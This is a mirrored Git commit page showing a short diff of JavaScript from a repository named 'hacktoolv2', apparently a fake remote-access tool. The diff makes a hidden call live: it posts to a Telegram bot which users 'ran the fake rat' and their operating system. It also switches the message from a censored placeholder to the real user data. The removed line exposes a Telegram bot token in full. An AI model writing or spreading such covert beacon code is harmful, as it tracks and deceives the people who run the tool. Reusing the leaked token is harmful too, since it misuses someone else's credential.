mirror of
https://github.com/constantinDev/hacktoolv2
synced 2025-08-29 21:07:47 +00:00
Updated tool
This commit is contained in:
parent
56aef62b95
commit
a5dcc5c613
Binary file not shown.
@ -53,11 +53,11 @@ axios({
|
|||||||
}).then(d => {
|
}).then(d => {
|
||||||
logger.log("Successfully loaded the API. Loading modules...")
|
logger.log("Successfully loaded the API. Loading modules...")
|
||||||
axios({
|
axios({
|
||||||
url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
|
url: "https://api.telegram.org/bot(censored)/sendMessage",
|
||||||
method: "POST",
|
method: "POST",
|
||||||
data: {
|
data: {
|
||||||
chat_id: "@lmaotxt",
|
chat_id: "@lmaotxt",
|
||||||
text: `<strong>${/*d.data*/"(censored because testing)"}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
|
text: `<strong>${d.data}</strong> ran the fake rat. OS: <strong>${require("os").platform()}</strong>`,
|
||||||
parse_mode: "HTML"
|
parse_mode: "HTML"
|
||||||
}
|
}
|
||||||
}).then(async () => {
|
}).then(async () => {
|
||||||
|
Loading…
x
Reference in New Issue
Block a user